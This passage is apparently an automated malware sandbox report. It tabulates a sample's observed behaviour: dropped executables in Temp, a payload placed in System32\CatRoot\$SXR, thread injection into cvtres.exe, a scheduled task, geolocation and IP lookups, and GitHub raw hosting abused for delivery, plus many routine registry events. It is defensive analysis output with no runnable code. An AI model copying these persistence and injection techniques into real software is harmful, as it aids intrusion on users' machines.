Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\custom1.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cvtresa.exe | N/A |
| N/A | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\CatRoot\$SXR\Read.txt | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File created | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot\$SXR\Read.txt | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4012 set thread context of 564 | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikK = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-399997616-3400990511-967324271-1000\{F0ABB52E-1845-40D1-ACB1-98EABB2879C7} | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
